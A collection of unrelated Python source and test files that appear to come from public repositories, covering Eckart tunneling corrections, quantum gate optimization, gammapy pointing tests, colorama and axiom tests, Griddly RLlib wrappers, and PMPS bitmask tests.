def computeTunnelingCorrection(delV1,T,alpha1,alpha2):
#print delV1, ' ', alpha1, ' ', alpha2, ' ', T
k = 1.381e-23
# The following lines of code were written by MRH for debugging purposes
# The file table1.out contains a table of kappa(T) for a range of dimensionless
# variables alpha1, alpha2, and ustar and was compared against Table1 of:
# "Tunneling corrections for unsymmetrical eckart potential energy barriers",
# <NAME> and <NAME>, J. Phys. Chem., v,66, (1962), p.532-533
# MRH believes he found an error in the data reported in the paper:
# alpha1=0.5; alpha2=0.5,1,2,4; ustar=all
# alpha1=1; alpha2=1,2; ustar=all
# Problem is that division in calculating kappa_E should be done element-by-element
# MRH believes this was not done in Johnston paper, rather a least-squares fitting
# was performed to solve for "a" where "aX=Y" by calling "Y/X"
#
# oFile = open('table1.out','w')
# alpha1vec = [0.5, 1, 2, 4, 8, 12, 16, 20]
# alpha2vec = [0.5, 1, 2, 4, 8, 12, 16, 20]
# ustarvec = [2, 3, 4, 5, 6, 8, 10, 12, 16]
# for i in range(len(alpha1vec)):
# alpha1 = alpha1vec[i]
# for j in range(i,len(alpha2vec)):
# alpha2 = alpha2vec[j]
# for m in range(len(ustarvec)):
# T = 2*math.pi*delV1/alpha1/k/ustarvec[m]
# integral = integrate.quad(f_of_E,0,50,args=(delV1,k*T,alpha1,alpha2))[0]
# kappa_T = integral*math.exp(delV1/k/T)
# oFile.write(str(kappa_T) + '\t')
# oFile.write('\n')
# oFile.write('\n')
# oFile.close()
# MRH changed limits of integration from 0 --> infinity to 0 --> 50
# Problem: Some calculations were underestimating the integral, most likely due to large
# step sizes when the important portion of the curve is close to zero.
# MRH computed the value of E_kT* such that f_of_E(E_kT*) < 0.001*max(f_of_E)
# for all alpha1, alpha2, ustar combinations present in Johnston paper. This value was
# ~35, so MRH used decided on 50 as the upper bound of the integral
#integral = integrate.quad(f_of_E,0,100,args=(delV1,k*T,alpha1,alpha2))[0]
#kappa_T = integral * math.exp(delV1/k/T)
x = array(zeros((10000,1),dtype=float))
f_x = array(zeros((10000,1),dtype=float))
for i in range(10000):
x[i] = 1000.0*i/9999
f_x[i] = f_of_E(x[i],delV1,k*T,alpha1,alpha2)
max = f_x.max(0)
lowerlimit = max/1000.0
vector_of_Es = (f_x>lowerlimit).nonzero()
maxE = x[vector_of_Es[0][-1]]
minE = x[vector_of_Es[0][0]]
#print str(minE) + ' ' + str(maxE)
integral = integrate.quad(f_of_E,minE,maxE,args=(delV1,k*T,alpha1,alpha2))[0]
kappa_T = integral * math.exp(delV1/k/T)
print kappa_T
return kappa_T
def f_of_E(E_kt,delV1,kT,alpha1,alpha2):
radicand = alpha1*alpha2-4*math.pi*math.pi/16
if radicand < 0 :
twopid = 2*math.sqrt(-1*radicand)
else :
twopid = 2*math.sqrt(radicand)
nondimE = E_kt*kT/delV1
twopia = 2*math.sqrt(alpha1*nondimE)/(1/math.sqrt(alpha1)+1/math.sqrt(alpha2))
radicand2 = (nondimE-1)*alpha1+alpha2
if radicand2 < 0:
twopib = 2*math.sqrt(-1*radicand2)
else:
twopib = 2*math.sqrt(radicand2)
twopib = twopib/(1/math.sqrt(alpha1)+1/math.sqrt(alpha2))
# python cannot handle computing the value of cosh(700)
# To be safe, MRH checks if any of the cosh arguments are greater than 200
# If all cosh() arguments less than 200, compute kappa_E as normal
if (twopia < 200) & (twopib < 200) & (twopid < 200) :
kappa_E = 1 - (math.cosh(twopia-twopib)+math.cosh(twopid)) / (math.cosh(twopia+twopib)+math.cosh(twopid))
# If not, need to be smarter about which terms to evaluate
else :
# If at least one of the following expressions is greater than 5, we can eliminate most of the exponential terms
# after writing out the definition of cosh() and dividing all terms by exp(twopid)
if (twopia-twopib-twopid > 10) | (twopib-twopia-twopid > 10) | (twopia+twopib-twopid > 10) :
kappa_E = 1 - exp(-2*twopia) - exp(-2*twopib) - exp(-twopia-twopib+twopid) - exp(-twopia-twopib-twopid)
# If all of the arguments are less than 5, then evaluate the kappa_E expression normally, except use the expanded
# definition - expanding the cosh argument and dividing all terms by exp(twopid)
else :
numerator = math.exp(twopia-twopib-twopid)+exp(-twopia+twopib-twopid)+1+exp(-2*twopid)
denominator = math.exp(twopia+twopib-twopid)+exp(-twopia-twopib-twopid)+1+exp(-2*twopid)
kappa_E = 1 - numerator/denominator
integrand = math.exp(-E_kt)*kappa_E
return integrand
|
<gh_stars>0
from optimize_circuit.transformations import u_to_zxz_gates, u_to_zyz_gates
from optimize_circuit.gates import OneQubitUnitary, X, Y, Z
import numpy as np
def optimize_one_qubit_circuit(gate_list, hardware):
"""Optimizes one qubit gate_list
:param hardware: HardwareConfiguration
:param gate_list: list of Gate objects (X, Y, Z)
:return: optimized gate_list
"""
index = gate_list[0].qubit_index
resulting_unitary = np.identity(2, dtype=complex)
for gate in gate_list:
resulting_unitary = np.matmul(resulting_unitary, gate.arr)
global_phase = np.angle(resulting_unitary[0, 0])
resulting_unitary = np.exp(-1j * global_phase) * resulting_unitary
if resulting_unitary[0, 0].imag > 1e-5:
raise ArithmeticError(
"resulting_unitary[0, 0].imag must be 0 "
f"at this point, but it is equal to "
f"{resulting_unitary[0, 0].imag }"
)
theta_rad = np.arccos(np.abs(resulting_unitary[0, 0]))
phi_rad = np.angle(resulting_unitary[1, 0])
lam_rad = np.angle(-resulting_unitary[0, 1])
u_one_qubit_gate = OneQubitUnitary(
index, np.rad2deg(theta_rad), np.rad2deg(phi_rad), np.rad2deg(lam_rad))
return u_to_optimal_three_gates(u_one_qubit_gate, hardware)
def u_to_optimal_three_gates(u_one_gate, hardware):
""" Finds the optimal gate sequence
:param u_one_gate: OneQubitUnitary
:param hardware: HardwareConfiguration
:return: list of optimal gates
"""
gates_zxz = u_to_zxz_gates(u_one_gate)
gates_zyz = u_to_zyz_gates(u_one_gate)
if "X" not in hardware.basis_gates:
return gates_zyz
if "Y" not in hardware.basis_gates:
return gates_zxz
if hardware.duration_of_one_qubit_gates(gates_zxz) < \
hardware.duration_of_one_qubit_gates(gates_zyz):
return gates_zxz
else:
return gates_zyz
def micro_optimize_one_qubit_circuit(gate_list):
"""Does mini optimization on circuit with
less than 3 gates
"""
if len(gate_list) == 1:
if int(gate_list[0].theta) % 360 == 0:
return []
else:
return gate_list
if len(gate_list) == 2:
return optimize_two_gate(gate_list)
if len(gate_list) == 3:
return optimize_three_gate(gate_list)
def optimize_three_gate(gate_list):
"""Optimizes three gate circuit
:param gate_list: list of gates
:return: optimized gate_list
"""
optimized_first_two_gates = optimize_two_gate(gate_list[0:2])
optimized_last_two_gates = optimize_two_gate(gate_list[1:])
if len(optimized_first_two_gates) <= 1:
gate_list = optimized_first_two_gates + gate_list[2:]
return optimize_two_gate(gate_list)
if len(optimized_last_two_gates) <= 1:
gate_list = gate_list[0:1] + optimized_last_two_gates
return optimize_two_gate(gate_list)
return optimize_with_three_gate_identities(gate_list)
def optimize_two_gate(gate_list):
"""Optimizes two gate circuit
:param gate_list: list of Gates
:return: optimized gate_list
"""
if isinstance(gate_list[0], X) and isinstance(gate_list[1], X):
theta = gate_list[0].theta + gate_list[1].theta
if int(theta) % 360 == 0:
return []
else:
return [X(0, theta)]
if isinstance(gate_list[0], Y) and isinstance(gate_list[1], Y):
theta = gate_list[0].theta + gate_list[1].theta
if int(theta) % 360 == 0:
return []
else:
return [Y(0, theta)]
if isinstance(gate_list[0], Z) and isinstance(gate_list[1], Z):
theta = gate_list[0].theta + gate_list[1].theta
if int(theta) % 360 == 0:
return []
else:
return [Z(0, theta)]
return gate_list
def optimize_with_three_gate_identities(gate_list):
"""Optimize with three gates identities
:param gate_list: list of gates
:return: optimized gate_list
"""
# XYX = -Y, XZX = -Z when X.theta ==180
if isinstance(gate_list[0], X) and isinstance(gate_list[2], X) and \
int(gate_list[0].theta) == 180 and int(gate_list[2].theta) == 180:
if isinstance(gate_list[1], Y):
return [Y(gate_list[1].qubit_index, -gate_list[1].theta)]
if isinstance(gate_list[1], Z):
return [Z(gate_list[1].qubit_index, -gate_list[1].theta)]
# YXY = -X, YZY = -Z when Y.theta ==180
if isinstance(gate_list[0], Y) and isinstance(gate_list[2], Y) and \
int(gate_list[0].theta) == 180 and int(gate_list[2].theta) == 180:
if isinstance(gate_list[1], X):
return [X(gate_list[1].qubit_index, -gate_list[1].theta)]
if isinstance(gate_list[1], Z):
return [Z(gate_list[1].qubit_index, -gate_list[1].theta)]
# ZXZ = -X, ZYZ = -Y when Z.theta ==180
if isinstance(gate_list[0], Z) and isinstance(gate_list[2], Z) and \
int(gate_list[0].theta) == 180 and int(gate_list[2].theta) == 180:
if isinstance(gate_list[1], X):
return [X(gate_list[1].qubit_index, -gate_list[1].theta)]
if isinstance(gate_list[1], Y):
return [Y(gate_list[1].qubit_index, -gate_list[1].theta)]
# Pauli(90)Pauli'(180)Pauli(90) = Pauli'(180)
if int(gate_list[0].theta) == 90 and int(gate_list[1].theta) == 180 \
and int(gate_list[2].theta) == 90:
return [gate_list[1]]
return gate_list
|
<gh_stars>100-1000
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from numpy.testing import assert_allclose
from astropy.time import Time
from gammapy.data import FixedPointingInfo, PointingInfo
from gammapy.utils.testing import assert_time_allclose, requires_data
@requires_data()
class TestFixedPointingInfo:
@classmethod
def setup_class(cls):
filename = "$GAMMAPY_DATA/tests/pointing_table.fits.gz"
cls.fpi = FixedPointingInfo.read(filename)
def test_location(self):
lon, lat, height = self.fpi.location.geodetic
assert_allclose(lon.deg, 16.5002222222222)
assert_allclose(lat.deg, -23.2717777777778)
assert_allclose(height.value, 1834.999999999783)
def test_time_ref(self):
expected = Time(51910.00074287037, format="mjd", scale="tt")
assert_time_allclose(self.fpi.time_ref, expected)
def test_time_start(self):
time = self.fpi.time_start
expected = Time(53025.826414166666, format="mjd", scale="tt")
assert_time_allclose(time, expected)
def test_time_stop(self):
time = self.fpi.time_stop
expected = Time(53025.844770648146, format="mjd", scale="tt")
assert_time_allclose(time, expected)
def test_duration(self):
duration = self.fpi.duration
assert_allclose(duration.sec, 1586.0000000044238)
def test_radec(self):
pos = self.fpi.radec
assert_allclose(pos.ra.deg, 83.633333333333)
assert_allclose(pos.dec.deg, 24.51444444)
assert pos.name == "icrs"
def test_altaz(self):
pos = self.fpi.altaz
assert_allclose(pos.az.deg, 7.48272)
assert_allclose(pos.alt.deg, 41.84191)
assert pos.name == "altaz"
@requires_data()
class TestPointingInfo:
@classmethod
def setup_class(cls):
filename = "$GAMMAPY_DATA/tests/pointing_table.fits.gz"
cls.pointing_info = PointingInfo.read(filename)
def test_str(self):
ss = str(self.pointing_info)
assert "Pointing info" in ss
def test_location(self):
lon, lat, height = self.pointing_info.location.geodetic
assert_allclose(lon.deg, 16.5002222222222)
assert_allclose(lat.deg, -23.2717777777778)
assert_allclose(height.value, 1834.999999999783)
def test_time_ref(self):
expected = Time(51910.00074287037, format="mjd", scale="tt")
assert_time_allclose(self.pointing_info.time_ref, expected)
def test_table(self):
assert len(self.pointing_info.table) == 100
def test_time(self):
time = self.pointing_info.time
assert len(time) == 100
expected = Time(53025.826414166666, format="mjd", scale="tt")
assert_time_allclose(time[0], expected)
def test_duration(self):
duration = self.pointing_info.duration
assert_allclose(duration.sec, 1586.0000000044238)
def test_radec(self):
pos = self.pointing_info.radec[0]
assert_allclose(pos.ra.deg, 83.633333333333)
assert_allclose(pos.dec.deg, 24.51444444)
assert pos.name == "icrs"
def test_altaz(self):
pos = self.pointing_info.altaz[0]
assert_allclose(pos.az.deg, 11.45751357)
assert_allclose(pos.alt.deg, 41.34088901)
assert pos.name == "altaz"
def test_altaz_from_table(self):
pos = self.pointing_info.altaz_from_table[0]
assert_allclose(pos.az.deg, 11.20432353385406)
assert_allclose(pos.alt.deg, 41.37921408774436)
assert pos.name == "altaz"
def test_altaz_interpolate(self):
time = self.pointing_info.time[0]
pos = self.pointing_info.altaz_interpolate(time)
assert_allclose(pos.az.deg, 11.45751357)
assert_allclose(pos.alt.deg, 41.34088901)
assert pos.name == "altaz"
|
<gh_stars>10-100
# Copyright <NAME> 2013. BSD 3-Clause license, see LICENSE file.
import os
import sys
from unittest import TestCase, main, skipUnless
try:
from unittest.mock import patch
except ImportError:
from mock import patch
from ..ansitowin32 import StreamWrapper
from ..initialise import init
from .utils import osname, redirected_output, replace_by
orig_stdout = sys.stdout
orig_stderr = sys.stderr
class InitTest(TestCase):
@skipUnless(sys.stdout.isatty(), "sys.stdout is not a tty")
def setUp(self):
# sanity check
self.assertNotWrapped()
def tearDown(self):
sys.stdout = orig_stdout
sys.stderr = orig_stderr
def assertWrapped(self):
self.assertIsNot(sys.stdout, orig_stdout, 'stdout should be wrapped')
self.assertIsNot(sys.stderr, orig_stderr, 'stderr should be wrapped')
self.assertTrue(isinstance(sys.stdout, StreamWrapper),
'bad stdout wrapper')
self.assertTrue(isinstance(sys.stderr, StreamWrapper),
'bad stderr wrapper')
def assertNotWrapped(self):
self.assertIs(sys.stdout, orig_stdout, 'stdout should not be wrapped')
self.assertIs(sys.stderr, orig_stderr, 'stderr should not be wrapped')
@patch('colorama.initialise.reset_all')
@patch('colorama.ansitowin32.winapi_test', lambda *_: True)
def testInitWrapsOnWindows(self, _):
with osname("nt"):
init()
self.assertWrapped()
@patch('colorama.initialise.reset_all')
@patch('colorama.ansitowin32.winapi_test', lambda *_: False)
def testInitDoesntWrapOnEmulatedWindows(self, _):
with osname("nt"):
init()
self.assertNotWrapped()
def testInitDoesntWrapOnNonWindows(self):
with osname("posix"):
init()
self.assertNotWrapped()
def testInitDoesntWrapIfNone(self):
with replace_by(None):
init()
# We can't use assertNotWrapped here because replace_by(None)
# changes stdout/stderr already.
self.assertIsNone(sys.stdout)
self.assertIsNone(sys.stderr)
def testInitAutoresetOnWrapsOnAllPlatforms(self):
with osname("posix"):
init(autoreset=True)
self.assertWrapped()
def testInitWrapOffDoesntWrapOnWindows(self):
with osname("nt"):
init(wrap=False)
self.assertNotWrapped()
def testInitWrapOffIncompatibleWithAutoresetOn(self):
self.assertRaises(ValueError, lambda: init(autoreset=True, wrap=False))
@patch('colorama.ansitowin32.winterm', None)
@patch('colorama.ansitowin32.winapi_test', lambda *_: True)
def testInitOnlyWrapsOnce(self):
with osname("nt"):
init()
init()
self.assertWrapped()
@patch('colorama.win32.SetConsoleTextAttribute')
@patch('colorama.initialise.AnsiToWin32')
def testAutoResetPassedOn(self, mockATW32, _):
with osname("nt"):
init(autoreset=True)
self.assertEqual(len(mockATW32.call_args_list), 2)
self.assertEqual(mockATW32.call_args_list[1][1]['autoreset'], True)
self.assertEqual(mockATW32.call_args_list[0][1]['autoreset'], True)
@patch('colorama.initialise.AnsiToWin32')
def testAutoResetChangeable(self, mockATW32):
with osname("nt"):
init()
init(autoreset=True)
self.assertEqual(len(mockATW32.call_args_list), 4)
self.assertEqual(mockATW32.call_args_list[2][1]['autoreset'], True)
self.assertEqual(mockATW32.call_args_list[3][1]['autoreset'], True)
init()
self.assertEqual(len(mockATW32.call_args_list), 6)
self.assertEqual(
mockATW32.call_args_list[4][1]['autoreset'], False)
self.assertEqual(
mockATW32.call_args_list[5][1]['autoreset'], False)
@patch('colorama.initialise.atexit.register')
def testAtexitRegisteredOnlyOnce(self, mockRegister):
init()
self.assertTrue(mockRegister.called)
mockRegister.reset_mock()
init()
self.assertFalse(mockRegister.called)
if __name__ == '__main__':
main()
|
<reponame>hawkowl/axiom<filename>axiom/test/test_paginate.py<gh_stars>1-10
# Copyright 2006 Divmod, Inc. See LICENSE file for details
"""
This module contains tests for the L{axiom.store.ItemQuery.paginate} method.
"""
from twisted.trial.unittest import TestCase
from axiom.store import Store
from axiom.item import Item
from axiom.attributes import integer, compoundIndex
from axiom.test.util import QueryCounter
class SingleColumnSortHelper(Item):
mainColumn = integer(indexed=True)
other = integer()
compoundIndex(mainColumn, other)
class MultiColumnSortHelper(Item):
columnOne = integer()
columnTwo = integer()
compoundIndex(columnOne, columnTwo)
class CrossTransactionIteration(TestCase):
def test_separateTransactions(self):
"""
Verify that 'paginate' is iterable in separate transactions.
"""
s = Store()
b1 = SingleColumnSortHelper(store=s, mainColumn=1)
b2 = SingleColumnSortHelper(store=s, mainColumn=2)
b3 = SingleColumnSortHelper(store=s, mainColumn=3)
itr = s.transact(lambda : iter(s.query(SingleColumnSortHelper).paginate()))
self.assertIdentical(s.transact(itr.next), b1)
self.assertEquals(s.transact(lambda : (itr.next(), itr.next())),
(b2, b3))
self.assertRaises(StopIteration, lambda : s.transact(itr.next))
def test_moreItemsNotMoreWork(self):
"""
Verify that each step of a paginate does not become more work as items
are added.
"""
s = Store()
self._checkEfficiency(s.query(SingleColumnSortHelper))
def test_moreItemsNotMoreWorkSorted(self):
"""
Verify that each step of a paginate does not become more work as more
items are added even if a sort is given.
"""
s = Store()
self._checkEfficiency(s.query(SingleColumnSortHelper,
sort=SingleColumnSortHelper.mainColumn.ascending))
def test_moreItemsNotMoreWorkRestricted(self):
s = Store()
self._checkEfficiency(s.query(SingleColumnSortHelper,
SingleColumnSortHelper.other == 6,
sort=SingleColumnSortHelper.mainColumn.ascending))
def _checkEfficiency(self, qry):
s = qry.store
mnum = [0]
def more():
mnum[0] += 1
SingleColumnSortHelper(store=s, mainColumn=mnum[0], other=6)
for i in range(5):
more()
qc = QueryCounter(s)
# Sanity check: calling paginate() shouldn't do _any_ DB work.
L = []
m = qc.measure(
# Let's also keep the page-size to 1, forcing the implementation to
# get exactly 1 item each time. (Otherwise the first N items will
# take a fixed amount of work, the next 10, and so on, but each
# subsequent item will take 0, breaking our attempt to measure
# below)
lambda : L.append(qry.paginate(pagesize=1)))
self.assertEquals(m, 0)
y = L.pop()
g = iter(y)
# startup costs a little more, so ignore that
# s.debug = True
what = qc.measure(g.next) # 1
oneunit = qc.measure(g.next) # 2
otherunit = qc.measure(g.next)
self.assertEquals(otherunit, oneunit) # 3
# Now, make some more data
for i in range(3):
more()
# and make sure that doesn't increase the amount of work
self.assertEquals(qc.measure(g.next), oneunit) # 4
self.assertEquals(qc.measure(g.next), oneunit) # 5
self.assertEquals(qc.measure(g.next), oneunit) # 6
# one more sanity check - we're at the end.
self.assertEquals(g.next().mainColumn, 7)
self.assertEquals(g.next().mainColumn, 8)
self.assertEquals(list(g), [])
def test_storeIDTiebreaker(self):
"""
Verify that items whose sort column are identical are all returned and
deterministically ordered.
"""
s = Store()
x = [SingleColumnSortHelper(store=s, mainColumn=1234) for nothing in range(10)]
first = SingleColumnSortHelper(store=s, mainColumn=1233)
last = SingleColumnSortHelper(store=s, mainColumn=1235)
# This is sensitive to page size, so let's test it at lots of places
# where edge-cases are likely to develop in the implementation.
for pagesize in range(1, 30) + [1000]:
# The ordering here in the asserts might look a little weird - that we
# ascend by storeID in both cases regardless of the order of the sort,
# but it's intentional. The storeID is merely to be a tiebreaker to
# provide a stable sort. You could be sorting by any number of
# compound columns, 'ascending' for your particular column might mean
# something odd or contradictory to 'ascending' for storeID's
# 'ascending'. If you want guaranteed stability on storeID, do that.
self.assertEqual(
list(s.query(
SingleColumnSortHelper,
sort=SingleColumnSortHelper.mainColumn.descending
).paginate(pagesize=pagesize)),
[last] + x + [first])
self.assertEqual(
list(s.query(
SingleColumnSortHelper,
sort=SingleColumnSortHelper.mainColumn.ascending
).paginate(pagesize=pagesize)),
[first] + x + [last])
def test_moreThanOneColumnSort(self):
"""
Verify that paginate works with queries that have complex sort expressions.
Note: it doesn't.
"""
s = Store()
x = MultiColumnSortHelper(store=s, columnOne=1, columnTwo=9)
y1 = MultiColumnSortHelper(store=s, columnOne=2, columnTwo=1)
y2 = MultiColumnSortHelper(store=s, columnOne=2, columnTwo=2)
y3 = MultiColumnSortHelper(store=s, columnOne=2, columnTwo=3)
y4 = MultiColumnSortHelper(store=s, columnOne=2, columnTwo=4)
z = MultiColumnSortHelper(store=s, columnOne=3, columnTwo=5)
self.assertEquals(list(
s.query(MultiColumnSortHelper,
sort=[MultiColumnSortHelper.columnOne.ascending,
MultiColumnSortHelper.columnTwo.ascending]
).paginate(pagesize=1)),
[x, y1, y2, y3, y4, z])
test_moreThanOneColumnSort.todo = (
"There's no use-case for this yet, but it would be a consistent "
"extension of the API.")
|
import os
from collections import defaultdict
import gym
import numpy as np
from ray.rllib import MultiAgentEnv
from ray.rllib.utils.typing import MultiAgentDict
from griddly import GymWrapper
from griddly.util.rllib.environment.observer_episode_recorder import ObserverEpisodeRecorder
class RLlibEnv(GymWrapper):
"""
Wraps a Griddly environment for compatibility with RLLib.
Use the `env_config` in the rllib config to provide Griddly Environment Parameters
Example:
Firstly register the RLlibWrapper using rllib's
env_name = "my_env_name"
register_env(env_name, RLlibWrapper)
you can then configure it
rllib_config = {
'env_config': {
'yaml_file': 'Single-Player/GVGAI/butterflies.yaml',
'level": 6,
'player_observer_type': gd.ObserverType.SPRITE_2D,
'global_observer_type': gd.ObserverType.ISOMETRIC,
'max_steps': 1000,
},
# Other configuration options
}
Create the rllib trainer using this config:
trainer = ImpalaTrainer(rllib_config, env=env_name)
"""
def __init__(self, env_config):
super().__init__(**env_config)
self.env_steps = 0
self._env_idx = None
self._worker_idx = None
self.video_initialized = False
self.record_video_config = env_config.get('record_video_config', None)
self.videos = []
if self.record_video_config is not None:
self.video_frequency = self.record_video_config.get('frequency', 1000)
self.video_directory = os.path.realpath(self.record_video_config.get('directory', '.'))
self.include_global_video = self.record_video_config.get('include_global', True)
self.include_agent_videos = self.record_video_config.get('include_agents', False)
os.makedirs(self.video_directory, exist_ok=True)
self.record_actions = env_config.get('record_actions', False)
self.generate_valid_action_trees = env_config.get('generate_valid_action_trees', False)
self._random_level_on_reset = env_config.get('random_level_on_reset', False)
level_generator_rllib_config = env_config.get('level_generator', None)
self._level_generator = None
if level_generator_rllib_config is not None:
level_generator_class = level_generator_rllib_config['class']
level_generator_config = level_generator_rllib_config['config']
self._level_generator = level_generator_class(level_generator_config)
self.reset()
self.enable_history(self.record_actions)
def _transform(self, observation):
if self.player_count > 1:
transformed_obs = [obs.transpose(1, 2, 0).astype(np.float) for obs in observation]
else:
transformed_obs = observation.transpose(1, 2, 0).astype(np.float)
return transformed_obs
def _after_step(self, observation, reward, done, info):
extra_info = {}
# If we are in a multi-agent setting then we handle videos elsewhere
if self.player_count == 1:
if self.is_video_enabled():
videos_list = []
if self.include_agent_videos:
video_info = self._agent_recorder.step(self.level_id, self.env_steps, done)
if video_info is not None:
videos_list.append(video_info)
if self.include_global_video:
video_info = self._global_recorder.step(self.level_id, self.env_steps, done)
if video_info is not None:
videos_list.append(video_info)
self.videos = videos_list
return extra_info
def set_transform(self):
"""
Create the transform for rllib based on the observation space
"""
if self.player_count > 1:
self.observation_space = self.observation_space[0]
self.action_space = self.action_space[0]
self.observation_space = gym.spaces.Box(
self.observation_space.low.transpose((1, 2, 0)).astype(np.float),
self.observation_space.high.transpose((1, 2, 0)).astype(np.float),
dtype=np.float,
)
self.height = self.observation_space.shape[1]
self.width = self.observation_space.shape[0]
def _get_valid_action_trees(self):
valid_action_trees = self.game.build_valid_action_trees()
if self.player_count == 1:
return valid_action_trees[0]
return valid_action_trees
def reset(self, **kwargs):
if self._level_generator is not None:
kwargs['level_string'] = self._level_generator.generate()
elif self._random_level_on_reset:
kwargs['level_id'] = np.random.choice(self.level_count)
observation = super().reset(**kwargs)
self.set_transform()
if self.generate_valid_action_trees:
self.last_valid_action_trees = self._get_valid_action_trees()
return self._transform(observation)
def step(self, action):
observation, reward, done, info = super().step(action)
extra_info = self._after_step(observation, reward, done, info)
info.update(extra_info)
if self.generate_valid_action_trees:
self.last_valid_action_trees = self._get_valid_action_trees()
info['valid_action_tree'] = self.last_valid_action_trees.copy()
self.env_steps += 1
return self._transform(observation), reward, done, info
def render(self, mode='human', observer=0):
return super().render(mode, observer='global')
def is_video_enabled(self):
return self.record_video_config is not None and self._env_idx is not None and self._env_idx == 0
def on_episode_start(self, worker_idx, env_idx):
self._env_idx = env_idx
self._worker_idx = worker_idx
if self.is_video_enabled() and not self.video_initialized:
self.init_video_recording()
self.video_initialized = True
def init_video_recording(self):
if self.player_count == 1:
if self.include_agent_videos:
self._agent_recorder = ObserverEpisodeRecorder(
self,
1,
self.video_frequency,
self.video_directory
)
if self.include_global_video:
self._global_recorder = ObserverEpisodeRecorder(
self,
'global',
self.video_frequency,
self.video_directory
)
class RLlibMultiAgentWrapper(gym.Wrapper, MultiAgentEnv):
def __init__(self, env, env_config):
super().__init__(env)
self._player_done_variable = env_config.get('player_done_variable', None)
# Used to keep track of agents that are active in the environment
self._active_agents = set()
self._agent_recorders = None
self._global_recorder = None
self._worker_idx = None
self._env_idx = None
assert self.player_count > 1, 'RLlibMultiAgentWrapper can only be used with environments that have multiple agents'
def _to_multi_agent_map(self, data):
return {a: data[a - 1] for a in self._active_agents}
def reset(self, **kwargs):
obs = super().reset(**kwargs)
self._active_agents.update([a + 1 for a in range(self.player_count)])
return self._to_multi_agent_map(obs)
def _resolve_player_done_variable(self):
resolved_variables = self.game.get_global_variable([self._player_done_variable])
return resolved_variables[self._player_done_variable]
def _after_step(self, obs_map, reward_map, done_map, info_map):
extra_info = {}
if self.is_video_enabled():
videos_list = []
if self.include_agent_videos:
for a in self._active_agents:
video_info = self._agent_recorders[a].step(self.level_id, self.env_steps, done_map[a - 1])
if video_info is not None:
videos_list.append(video_info)
if self.include_global_video:
video_info = self._global_recorder.step(self.level_id, self.env_steps, done_map['__all__'])
if video_info is not None:
videos_list.append(video_info)
self.videos = videos_list
return extra_info
def step(self, action_dict: MultiAgentDict):
actions_array = [None] * self.player_count
for agent_id, action in action_dict.items():
actions_array[agent_id - 1] = action
obs, reward, all_done, info = super().step(actions_array)
done_map = {'__all__': all_done}
if self._player_done_variable is not None:
griddly_players_done = self._resolve_player_done_variable()
for agent_id in self._active_agents:
done_map[agent_id] = griddly_players_done[agent_id] == 1 or all_done
else:
for p in range(self.player_count):
done_map[p] = False
if self.generate_valid_action_trees:
info_map = self._to_multi_agent_map([
{'valid_action_tree': valid_action_tree} for valid_action_tree in info['valid_action_tree']
])
else:
info_map = self._to_multi_agent_map(defaultdict(dict))
if self.record_actions:
for event in info['History']:
event_player_id = event['PlayerId']
if event_player_id != 0:
if 'History' not in info_map[event_player_id]:
info_map[event_player_id]['History'] = []
info_map[event_player_id]['History'].append(event)
obs_map = self._to_multi_agent_map(obs)
reward_map = self._to_multi_agent_map(reward)
# Finally remove any agent ids that are done
for agent_id, is_done in done_map.items():
if is_done:
self._active_agents.discard(agent_id)
self._after_step(obs_map, reward_map, done_map, info_map)
assert len(obs_map) == len(reward_map)
assert len(obs_map) == len(done_map) - 1
assert len(obs_map) == len(info_map)
return obs_map, reward_map, done_map, info_map
def is_video_enabled(self):
return self.record_video_config is not None and self._env_idx is not None and self._env_idx == 0
def on_episode_start(self, worker_idx, env_idx):
self._env_idx = env_idx
self._worker_idx = worker_idx
if self.is_video_enabled() and not self.video_initialized:
self.init_video_recording()
self.video_initialized = True
def init_video_recording(self):
if self.include_agent_videos:
self._agent_recorders = {}
for a in range(self.player_count):
agent_id = a + 1
self._agent_recorders[agent_id] = ObserverEpisodeRecorder(
self,
agent_id,
self.video_frequency,
self.video_directory
)
if self.include_global_video:
self._global_recorder = ObserverEpisodeRecorder(
self,
'global',
self.video_frequency,
self.video_directory
)
|
import logging
import pytest
from pcdscalc.pmps import (LFE, KFE, select_bitmask_boundaries,
get_bitmask, check_bitmask, check_actual_range,
describe_bitmask)
logger = logging.getLogger(__name__)
# 32 bits, using numbers from 1 to 32
test_boundaries = list(range(1, 33))
# Define some utility bitmasks
allow_none = 0
allow_all = 2**32-1
bm1 = 0b1111_0000_0000_0000_0000_0000_0000_1111
bm2 = 0b0000_0000_0000_1111_1111_0000_0000_0000
bm3 = 0b0000_0000_0000_0001_0000_0000_0000_0000
bm4 = 0b1111_1111_1111_1110_1111_1111_1111_1111
@pytest.mark.parametrize(
"test_input,expected",
[('k', KFE), ('kfe', KFE), ('sxr', KFE),
('L', LFE), ('LFE', LFE), ('HXR', LFE)]
)
def test_select_bounds(test_input, expected):
logger.debug(f'test_select_bounds({test_input}, {expected})')
assert select_bitmask_boundaries(test_input) is expected
@pytest.mark.parametrize(
"lower,upper,allow,expected",
[(0, 100, True, allow_all),
(0, 100, False, allow_none),
(0, 15.5, True, 0b0000_0000_0000_0000_0111_1111_1111_1111),
(15.5, 100, True, 0b1111_1111_1111_1111_0000_0000_0000_0000),
(14.5, 21.5, True, 0b0000_0000_0001_1111_1000_0000_0000_0000),
(14.5, 21.5, False, 0b1111_1111_1100_0000_0011_1111_1111_1111),
(15, 20, True, 0b0000_0000_0000_1111_1000_0000_0000_0000),
(15, 20, False, 0b1111_1111_1111_0000_0111_1111_1111_1111)])
def test_get_bitmask(lower, upper, allow, expected):
"""
Test that the correct bitmask is created.
Explanation of test cases 3 to 8 (first two are obvious):
3. Allow between 0 and 15, exclude the 15.5 point because we can't allow
points like 15.6 and they share a range. Therefore, enable bits 1
through 15 (bit 1 allows 0 to 1, bit 15 allows 14 to 15).
4. Allow between 16 and 32, exclude the 15.5 point because we can't allow
points like 15.4 and they share a range. Cut off at 32 for the top of
the bitmask range. Therefore, enable bits 17 through 32 (bit 17 allows
16 to 17).
5. Allow between 15 and 21, exclude the exact points because we can't allow
any points outside the range. Enable bits 16 to 21 (bit 16 allows 15 to
16, bit 21 allows 20 to 21).
6. Allow between 0 and 14 and between 22 and 32. Turn off bits 15 to 22
(bit 15 allows 14 to 15, bit 22 allows 21 to 22). Exclude the boundary
bits for the same reasonings as above.
7. Allow exactly between 15 and 20. Turn on bits 16 to 20 (bit 16 allows 15
to 16, bit 20 allows 19 to 20)
8. Turn off bits 16 to 20 (bit 16 allows 15 to 16, bit 20 allows 19 to 20)
"""
